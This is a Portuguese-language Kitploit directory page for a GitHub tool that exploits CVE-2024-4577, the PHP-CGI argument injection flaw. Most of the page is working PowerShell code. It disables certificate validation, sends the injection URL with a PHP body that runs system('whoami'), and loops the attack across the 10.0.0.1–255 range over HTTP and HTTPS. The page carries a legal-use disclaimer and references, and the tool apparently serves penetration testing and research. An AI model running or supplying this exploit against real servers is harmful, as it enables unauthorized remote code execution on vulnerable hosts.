Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4577_PowerShell — Use o PowsrShell para escanear CVE-2024-4577 | Kitploit
Ferramentas/GitHubGitHub/tntrock/cve-2024-4577_powershell
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubtntrock/cve-2024-4577_powershell

CVE-2024-4577_PowerShell

Use o PowsrShell para escanear CVE-2024-4577

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-4577_PowerShell

Atenção:
Certifique-se de que você está autorizado a realizar este tipo de teste de penetração no ambiente-alvo; o uso não autorizado de técnicas de ataque pode violar as leis aplicáveis.
O programa destina-se apenas a fins educacionais e de pesquisa; use-o dentro dos limites legais e éticos.
Se você não compreende as possíveis consequências de um teste de penetração, é recomendável contratar um especialista em red team para realizar o teste.

Descrição

Primeiro, configure para ignorar a verificação de certificados da web

root@kitploit:~
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Payload principal de ataque

root@kitploit:~
$url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
$body = "<?php system('whoami'); die(); ?>"

Empacote em uma function e envie usando o Invoke-WebRequest nativo do PowerShell (você pode ajustar a configuração TimeoutSec conforme necessário)

root@kitploit:~
function Invoke-RequestForIP {
    param (
        [string]$IP,
        [string]$Protocol
    )
    $url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    $body = "<?php system('whoami'); die(); ?>"
    try {
        $response = Invoke-WebRequest -Uri $url -Method Post -Body $body -UseBasicParsing -TimeoutSec 2
        return $response.Content
    } catch {
        return $_.Exception.Message
    }
}

Através de um loop, escaneie 10.0.0.1 ~ 10.0.0.255

root@kitploit:~
$baseIP = "10.0.0."
$start = 1
$end = 255

for ($i = $start; $i -le $end; $i++) {
    $currentIP = $baseIP + $i
    foreach ($protocol in @("http", "https")) {
        $result = Invoke-RequestForIP -IP $currentIP -Protocol $protocol
        Write-Output "IP: $currentIP, Protocol: $protocol, Result: $result"
    }
}

Referências

https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability
https://nvd.nist.gov/vuln/detail/cve-2024-4577

Baixar ferramenta